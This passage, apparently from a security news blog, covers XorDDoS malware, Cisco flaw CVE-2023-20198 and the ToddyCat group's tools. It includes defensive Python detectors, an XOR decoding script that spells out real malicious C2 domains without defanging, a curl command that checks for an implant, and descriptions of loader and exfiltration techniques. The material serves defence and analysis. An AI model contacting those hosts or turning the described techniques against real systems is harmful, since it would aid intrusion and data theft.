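        ip, _method, path, status = m.groups()
        decoded = unquote(unquote(path))        # also catches double-encoded %252e
        if "../" in decoded and decoded.endswith("/etc/passwd"):
            hits.append((ip, decoded, int(status)))
    return hits


def ssh_bruteforce_sources(log: str, threshold: int = 4) -> dict:
    """ip -> {'failures': n, 'succeeded': bool} for sources at or above
    `threshold` failures.  A success after a burst of failures is the
    case worth paging on, since it matches the access path described above."""
    failures = Counter()
    accepted = set()
    for line in log.splitlines():
        f = SSH_FAIL_RE.search(line)
        if f:
            failures[f.group(1)] += 1
            continue
        a = SSH_OK_RE.search(line)
        if a:
            accepted.add(a.group(1))
    return {ip: {"failures": n, "succeeded": ip in accepted}
            for ip, n in failures.items() if n >= threshold}
```

Correlating the two (the same source first pulling /etc/passwd over HTTP, then succeeding over SSH after repeated failures) is the signal that distinguishes this campaign’s access pattern from background internet noise.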

XorDDoS Infects Linux Devices

XorDDoS Trojan uses an XOR encryption key (BB2FA36AAA9541F0) to encrypt all the execution-related data which are then decrypted using a decryption function. Once the malware is activated on the victim machine, it retrieves essential information such as /var/run/gcc.pid, the OS version, malware version, memory status, and CPU information.

The malware also uses the decrypt_remotestr() function to decrypt the C2 domains embedded in the executable. The C2 endpoints are:

  • ppp.gggatat456[.]com:53
  • ppp.xxxatat456[.]com:53
  • p5.dddgata789[.]com:53
  • P5.lpjulidny7[.]com:53
C2 decryption function (Source: Palo Alto Unit42)
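To show what an analyst does with a key like the one above, here is an added example (not Unit42's code and not the malware's own decrypt_remotestr()) that reproduces the technique: repeating-key XOR is its own inverse, so one routine both obfuscates and recovers strings, and an analyst can walk a binary's NUL-separated fields, apply the key to each, and keep the fields that decode to printable ASCII. The key is the one quoted above; treating it as a 16-byte ASCII string that restarts at each NUL-terminated field is an assumption, and the sample blob (the page's endpoints with the [.] defanging removed, plus filler bytes) is constructed here.

```python
"""Repeating-key XOR string recovery in the style of XorDDoS's decrypt_remotestr().

Added example, not Unit42's or the malware's code. Assumptions: the key quoted in
the write-up is used as a 16-byte ASCII string, and the key stream restarts for
every NUL-terminated string in the binary.
"""

XOR_KEY = b"BB2FA36AAA9541F0"          # key quoted in the write-up (ASCII bytes: assumption)
PRINTABLE = set(range(0x20, 0x7F))     # bytes we accept as a decoded ASCII string


def xor_with_key(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """XOR every byte of data with the repeating key; applying it twice restores the input."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_cstring(blob: bytes, offset: int, key: bytes = XOR_KEY) -> str:
    """Decrypt one XOR-obfuscated, NUL-terminated string that starts at `offset`."""
    end = blob.find(b"\x00", offset)
    if end == -1:
        end = len(blob)
    return xor_with_key(blob[offset:end], key).decode("ascii", errors="replace")


def carve_strings(blob: bytes, key: bytes = XOR_KEY, min_len: int = 6) -> list:
    """Walk NUL-separated fields and keep those that decrypt to printable ASCII.

    This is the analyst-side counterpart of the malware's per-string decryption:
    it needs no knowledge of where the strings sit, only the key.
    """
    found = []
    offset = 0
    while offset < len(blob):
        end = blob.find(b"\x00", offset)
        if end == -1:
            end = len(blob)
        field = blob[offset:end]
        if len(field) >= min_len:
            plain = xor_with_key(field, key)
            if all(c in PRINTABLE for c in plain):
                found.append(plain.decode("ascii"))
        offset = end + 1
    return found


# Constructed sample: the C2 endpoints quoted in the post (defanging removed),
# XOR-obfuscated the way the binary would embed them, preceded by filler bytes
# that must not decode to a printable string.
C2_ENDPOINTS = [
    "ppp.gggatat456.com:53",
    "ppp.xxxatat456.com:53",
    "p5.dddgata789.com:53",
    "p5.lpjulidny7.com:53",
]


def build_sample_blob() -> bytes:
    """Build the constructed 'binary' section used for the demonstration."""
    fields = [xor_with_key(e.encode("ascii")) for e in C2_ENDPOINTS]
    for f in fields:
        # A NUL inside an obfuscated field would split it; none occur for these inputs.
        assert b"\x00" not in f
    junk = bytes([0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87])
    return b"\x00".join([junk] + fields) + b"\x00"


if __name__ == "__main__":
    blob = build_sample_blob()
    for s in carve_strings(blob):
        print("recovered:", s)
```

Running the block recovers the four endpoints and discards the filler; the same carve_strings() routine applied to a real sample's .data or .rodata section is how the embedded domains are enumerated once the key is known.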

Persistence

As a means of persistence, the malware creates scheduled autorun tasks that run every three minutes, along with an autorun service configured to start at boot.

Detection evasion is achieved by turning its process into a background service that can disguise itself as a legitimate process.

C2 Network Infrastructure

A list of C2 domains that were registered and used by the threat actors is as follows:

C2 Domain | Name Server | C2 Subdomains | IP Addresses | Autonomous System
xxxatat456[.]com | name-services[.]com | aaa.xxxatat456[.]com, b12.xxxatat456[.]com, ppp.xxxatat456[.]com, www.ppp.xxxatat456[.]com, www.xxxatat456[.]com | 142.0.138[.]41, 142.0.138[.]42, 142.0.138[.]43, 142.0.138[.]44, 142.4.106[.]73, 142.4.106[.]75, 192.74.236[.]33, 192.74.236[.]34, 192.74.236[.]35 | 54600
gggatat456[.]com | name-services[.]com | aaa.gggatat456[.]com, ppp.gggatat456[.]com, www1.gggatat456[.]com, www.ppp.gggatat456[.]com | 142.0.138[.]41, 142.0.138[.]42, 142.0.138[.]43, 142.4.106[.]73, 142.4.106[.]74, 142.4.106[.]75, 142.4.106[.]76, 192.74.236[.]33, 192.74.236[.]34, 192.74.236[.]35, 192.74.236[.]36 | 54600
lpjulidny7[.]com | domaincontrol[.]com | p0.lpjulidny7[.]com, p2.lpjulidny7[.]com, p3.lpjulidny7[.]com, p4.lpjulidny7[.]com, p5.lpjulidny7[.]com | 34.98.99[.]30 | 396982
dddgata789[.]com | domaincontrol[.]com | ddd.dddgata789[.]com, p5.dddgata789[.]com | N/A | N/A

Source: Palo Alto Unit42

Complete Network Infrastructure (Source: Palo Alto Unit42)

Furthermore, Unit42 of Palo Alto has published a comprehensive report on this new campaign and the trojan, covering the campaign itself, code analysis, obfuscation techniques, and other details.

Indicators of Compromise (IoCs)

XorDDoS Binaries

  • b8c4d68755d09e9ad47e0fa14737b3d2d5ad1246de5ef1b3c794b1339d8fe9f8
  • 265a38c6dee58f912ff82a4e7ce3a32b2a3216bffd8c971a7414432c5f66ef11
  • 1e823ae1e8d2689f1090b09dc15dc1953fa0d3f703aec682214750b9ef8795f1
  • 989a371948b2c50b1d45dac9b3375cbbf832623b30e41d2e04d13d2bcf76e56b
  • 20f202d4a42096588c6a498ddb1e92f5b7531cb108fca45498ac7cd9d46b6448
  • 9c5fc75a453276dcd479601d13593420fc53c80ad6bd911aaeb57d8da693da43
  • ce0268e14b9095e186d5d4fe0b3d7ced0c1cc5bd9c4823b3dfa89853ba83c94f
  • aeb29dc28699b899a89c990eab32c7697679f764f9f33de7d2e2dc28ea8300f5



Tags: DDoS attacks, XorDDoS


Oct 17 2023

CISCO’S TICKING TIME BOMB: CVE-2023-20198 WITH CVSS SCORE 10 HITS CISCO DEVICES

Category: Network security | disc7 @ 9:10 am

Cisco IOS XE is a robust and flexible operating system, optimized for the evolving landscape of enterprise networking and technology. It enables model-driven programmability, application hosting, and automated configuration management, thus simplifying many day-to-day tasks. IOS XE is integral in providing consistency across Cisco’s array of switching, routing, and wireless network devices.

THE VULNERABILITY: CVE-2023-20198


A new, critical zero-day vulnerability has emerged, labeled as CVE-2023-20198. This vulnerability, with a maximum severity rating of CVSS 10, predominantly affects devices running the Cisco IOS XE software and is currently without a patch, leaving systems vulnerable to potential exploits. The flaw can be exploited by an unauthenticated attacker to create a user account with the highest privilege level, leading to unauthorized system access.

Exploitation in the Wild
Attackers have already begun exploiting this vulnerability in the wild, utilizing it to deliver malicious implants. Organizations using the affected devices are advised to apply mitigation measures promptly to defend against these exploits.

Affected Devices and Systems
The vulnerability, CVE-2023-20198, affects all Cisco IOS XE devices that have the Web UI feature enabled, especially when exposed to the internet or untrusted networks. To ascertain if a system is vulnerable, administrators should:

  1. Utilize the command show running-config | include ip http server|secure|active to check for the presence of ip http server or ip http secure-server commands in the global configuration.
  2. Inspect the configuration for ip http active-session-modules none or ip http secure-active-session-modules none to determine if the vulnerability is exploitable over HTTP or HTTPS respectively.

Cisco’s Response
Cisco has acknowledged the vulnerability, confirming its presence in devices running the Cisco IOS XE software. The company provided steps to identify affected systems and noted the following Indicators of Compromise (IoCs):

  1. System logs containing messages indicating programmatic configuration by unfamiliar users, such as:
  • %SYS-5-CONFIG_P: Configured programmatically by process SEP_webui_wsma_http from console as user on line.
  • %SEC_LOGIN-5-WEBLOGIN_SUCCESS: Login Success [user: user] [Source: source_IP_address].
  2. System logs containing messages about unknown file installation actions, like:
  • %WEBUI-6-INSTALL_OPERATION_INFO: User: username, Install Operation: ADD filename.
  3. Presence of an implant, checked by issuing the following command from a workstation with access to the affected system:
  • curl -k -X POST "https://systemip/webui/logoutconfirm.html?logon_hash=1" (if a hexadecimal string is returned, the implant is present).
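The two configuration checks and the log IoCs above are easy to get wrong by eye across a fleet, so here is an added example (not Cisco's or Tenable's tooling) that applies them to text already collected from devices: the output of show running-config | include ip http server|secure|active, and a syslog export. It encodes the post's rule that ip http server / ip http secure-server enable the Web UI on HTTP / HTTPS and that the matching active-session-modules none line removes the vulnerable modules for that transport, then flags the three log message families when the user is not on an expected-admin list. The sample config, sample log lines, user names and the expected-admin list are all constructed for illustration.

```python
"""Exposure check and log triage for CVE-2023-20198 (Cisco IOS XE Web UI).

Added example, not Cisco's own tooling. It works on text you have already
collected from a device; it does not connect to anything. All sample data and
the KNOWN_USERS allow-list are constructed.
"""
import re

# Constructed: possible output of `show running-config | include ip http server|secure|active`
SAMPLE_CONFIG = """\
ip http server
ip http secure-server
ip http secure-active-session-modules none
"""

# Constructed syslog lines modelled on the IoC message formats quoted in the post.
SAMPLE_LOGS = """\
%SYS-5-CONFIG_I: Configured from console by admin on vty0 (10.0.0.5)
%SEC_LOGIN-5-WEBLOGIN_SUCCESS: Login Success [user: unknown-user1] [Source: 192.0.2.44]
%SYS-5-CONFIG_P: Configured programmatically by process SEP_webui_wsma_http from console as user unknown-user1 on line 0
%WEBUI-6-INSTALL_OPERATION_INFO: User: unknown-user1, Install Operation: ADD evil.pkg
%SEC_LOGIN-5-WEBLOGIN_SUCCESS: Login Success [user: netops] [Source: 10.0.0.5]
"""

KNOWN_USERS = {"admin", "netops"}   # constructed: accounts expected to touch the device

CONFIG_P = re.compile(r"%SYS-5-CONFIG_P: Configured programmatically by process (\S+) .* as user (\S+)")
WEBLOGIN = re.compile(r"%SEC_LOGIN-5-WEBLOGIN_SUCCESS: Login Success \[user: ([^\]]+)\] \[Source: ([^\]]+)\]")
INSTALL = re.compile(r"%WEBUI-6-INSTALL_OPERATION_INFO: User: ([^,]+), Install Operation: (\S+) (\S+)")


def assess_webui_exposure(config_text: str) -> dict:
    """Return, per transport, whether the Web UI is enabled and not neutralised.

    Rule from the post: `ip http server` / `ip http secure-server` enable the Web UI
    on HTTP / HTTPS; `ip http active-session-modules none` /
    `ip http secure-active-session-modules none` disable the exploitable modules
    for that transport.
    """
    lines = {ln.strip() for ln in config_text.splitlines()}
    http_on = "ip http server" in lines
    https_on = "ip http secure-server" in lines
    http_modules_off = "ip http active-session-modules none" in lines
    https_modules_off = "ip http secure-active-session-modules none" in lines
    return {
        "http_exposed": http_on and not http_modules_off,
        "https_exposed": https_on and not https_modules_off,
    }


def triage_logs(log_text: str, known_users=KNOWN_USERS) -> list:
    """Flag the IoC message families from the post; returns (label, detail) tuples."""
    findings = []
    for line in log_text.splitlines():
        if m := CONFIG_P.search(line):
            proc, user = m.groups()
            if user not in known_users:
                findings.append(("programmatic_config_unknown_user", f"{user} via {proc}"))
        elif m := WEBLOGIN.search(line):
            user, src = m.groups()
            if user not in known_users:
                findings.append(("webui_login_unknown_user", f"{user} from {src}"))
        elif m := INSTALL.search(line):
            # Any install through the Web UI is worth a look, whoever did it.
            user, op, fname = m.groups()
            findings.append(("webui_install_operation", f"{user} {op} {fname}"))
    return findings


if __name__ == "__main__":
    print("exposure:", assess_webui_exposure(SAMPLE_CONFIG))
    for label, detail in triage_logs(SAMPLE_LOGS):
        print(f"{label}: {detail}")
```

On the constructed config the HTTP listener is still exposed while HTTPS has its session modules turned off, and the log pass surfaces the unknown account's Web UI login, its programmatic configuration and the package install, while leaving the known operator's login alone. Feed the functions the real command output and a syslog export per device to get the same verdicts at scale.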

Cisco, alongside other cybersecurity firms like Tenable, has provided plugins to identify affected systems. While awaiting a patch, these plugins and the aforementioned checks can assist in identifying and mitigating unauthorized access attempts.


CVE-2023-20198 poses a significant threat to cybersecurity due to its maximum severity rating and the absence of a patch. Organizations using affected Cisco IOS XE devices should remain vigilant and apply necessary mitigation measures to safeguard their systems from potential exploits.



Tags: Cisco, CVE-2023-20198, Zero Trust Architecture


Oct 16 2023

GUARDIANS OF THE HACKERS GALAXY: UNLOCK THE TOOL OF TODDYCAT’S GROUP

Category: Cyber Espionage, Security Tools | disc7 @ 9:36 am

COMPREHENSIVE ANALYSIS: TODDYCAT’S ADVANCED TOOLSET AND STEALTHY CYBER ESPIONAGE TACTICS

ToddyCat, an Advanced Persistent Threat (APT) group, has garnered attention for its clandestine cyber-espionage operations, which rely on a sophisticated toolset designed for data theft and exfiltration. The group employs a range of techniques to move laterally within networks and conduct espionage with a high degree of secrecy and efficiency. This article, drawing on the source article and other sources, aims to provide a detailed overview of ToddyCat's toolset and operational tactics.

STEALTH AND SOPHISTICATION: TODDYCAT’S MODUS OPERANDI

ToddyCat employs disposable malware, ensuring no clear code overlaps with known toolsets, thereby enhancing its ability to remain undetected. The malware is designed to steal and exfiltrate data, while the group employs various techniques to move laterally within networks and conduct espionage operations.

EXPLOITATION TECHNIQUES AND MALWARE UTILIZATION

  • Disposable Malware: Utilized to enhance stealth and evasion capabilities.
  • Data Exfiltration: Malware designed to access and extract sensitive information.
  • Lateral Movement: Techniques employed to expand reach and access within compromised environments.

TOOLSET SUMMARY

  1. Dropbox Exfiltrator: A tool designed to exfiltrate data, ensuring that stolen information can be securely and covertly transferred to the attackers.
  2. LoFiSe: A tool that may be utilized for lateral movement and further exploitation within compromised networks.
  3. Pcexter: A tool that may be used to send specific files or data to external servers, facilitating data exfiltration.
  4. Dropper: A tool that may be utilized to deploy additional payloads or malware within compromised environments.

DETAILED INSIGHTS INTO THE TOOLSET

1. LOADERS

  • Standard Loaders: ToddyCat uses 64-bit libraries, invoked by rundll32.exe or side-loaded alongside legitimate executables, to load the Ninja Trojan during the infection phase. Three variants of these loaders have been observed, differing in what loads the library, where the malicious code resides, which file is loaded, and what the next stage is.
  • Tailored Loader: A variant of the standard loader, this is customized for specific systems, employing a unique decryption scheme and storing encrypted files in a different location and filename (%CommonApplicationData%\Local\user.key).
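Two of the loader traits above translate directly into telemetry: rundll32.exe being handed a DLL that lives outside the Windows system directories, and the tailored loader's encrypted file landing at %CommonApplicationData%\Local\user.key. The following added example (not Kaspersky's research code and not anything of ToddyCat's) runs those two checks over constructed process-creation and file-creation events. Assumptions: Sysmon-style field names (command_line, target), %CommonApplicationData% resolving to C:\ProgramData, and every event and path in the sample list being invented for the demonstration.

```python
"""Detection sketch for the ToddyCat loader behaviours described in the post.

Added example, not Kaspersky's or the threat actor's code. Assumptions: events
carry Sysmon-style fields, and %CommonApplicationData% resolves to C:\\ProgramData.
All sample events are constructed.
"""
import ntpath
import re
from typing import Optional

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
USER_KEY_PATH = r"c:\programdata\local\user.key"   # %CommonApplicationData%\Local\user.key (assumed resolution)

# rundll32 syntax is `rundll32[.exe] <dll>,<EntryPoint> [args]`; the DLL may be quoted.
RUNDLL32_RE = re.compile(r'\s*"?(.*?rundll32(?:\.exe)?)"?\s+"?([^",]+)"?\s*,', re.IGNORECASE)


def rundll32_dll_path(command_line: str) -> Optional[str]:
    """Return the DLL argument of a rundll32 command line, or None if it is not rundll32."""
    m = RUNDLL32_RE.match(command_line)
    return m.group(2).strip() if m else None


def is_in_system_dir(path: str) -> bool:
    """True when the path sits under one of the Windows system directories."""
    p = path.lower()
    return any(p.startswith(d + "\\") for d in SYSTEM_DIRS)


def classify_event(event: dict) -> list:
    """Return finding labels for one event; an empty list means nothing matched."""
    findings = []
    if event.get("type") == "process_create":
        dll = rundll32_dll_path(event.get("command_line", ""))
        # Bare names like shell32.dll resolve through the loader search order and need
        # the working directory to judge, so this sketch only flags absolute non-system paths.
        if dll is not None and ntpath.isabs(dll) and not is_in_system_dir(dll):
            findings.append("rundll32_nonsystem_dll")
    elif event.get("type") == "file_create":
        if event.get("target", "").lower() == USER_KEY_PATH:
            findings.append("toddycat_userkey_path")
    return findings


def scan(events: list) -> list:
    """Apply classify_event to every event; returns (event_index, label) pairs."""
    return [(i, label) for i, e in enumerate(events) for label in classify_event(e)]


# Constructed sample telemetry: two benign rundll32 uses, one suspicious one, one file drop.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"type": "process_create", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r'rundll32.exe "C:\Users\Public\Libraries\update.dll",Start'},
    {"type": "file_create", "image": r"C:\Users\Public\Libraries\svchost.exe",
     "target": r"C:\ProgramData\Local\user.key"},
    {"type": "process_create", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\printui.dll,PrintUIEntry /?"},
]


if __name__ == "__main__":
    for idx, label in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {label}")
```

On the sample list only the DLL loaded from C:\Users\Public\Libraries and the user.key write are reported; the two rundll32 invocations that stay inside System32 pass. The side-loading variant (a legitimate signed executable loading a DLL from its own directory) needs image-load telemetry and a baseline of expected loaders, which this sketch deliberately leaves out.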

2. NINJA TROJAN

The Ninja Trojan, a sophisticated malware written in C++, is a potent tool in ToddyCat’s arsenal. It provides functionalities like:

  • Managing running processes
  • File system management
  • Managing multiple reverse shell sessions
  • Injecting code into arbitrary processes
  • Loading additional modules during runtime
  • Proxy functionality to forward TCP packets between the C2 and a remote host

3. LOFISE

LoFiSe is a component designed to find and collect files of interest on targeted systems. It tracks changes in the file system, filtering files based on size, location, and extension, and collects suitable files for further action.

4. DROPBOX UPLOADER

This generic uploader, not exclusive to ToddyCat, is used to exfiltrate stolen documents to Dropbox; it accepts a Dropbox user access token as an argument and uploads files with specific extensions.

5. PCEXTER

Pcexter is another uploader used to exfiltrate archive files to Microsoft OneDrive. It is distributed as a DLL file and executed using the DLL side-loading technique.

POTENTIAL IMPACT AND THREAT LANDSCAPE

The emergence of ToddyCat’s new toolset and its sophisticated TTPs presents a significant threat to organizations, with potential impacts including data breaches, unauthorized access to sensitive information, and network compromise.

MITIGATION AND DEFENSE STRATEGIES

  • Enhanced Monitoring: Implementing monitoring solutions to detect anomalous activities.
  • User Education: Ensuring users are educated about potential threats and cybersecurity best practices.
  • Regular Patching: Keeping all systems regularly patched and updated.
  • Threat Intelligence: Leveraging intelligence to stay abreast of the latest TTPs employed by threat actors.

ToddyCat’s advanced toolset and stealthy operations underscore the evolving and sophisticated nature of cyber threats. Organizations and cybersecurity practitioners must remain vigilant and adopt advanced cybersecurity practices to defend against the sophisticated tools and tactics employed by threat actors like ToddyCat.


Tags: ToddyCat’s Group

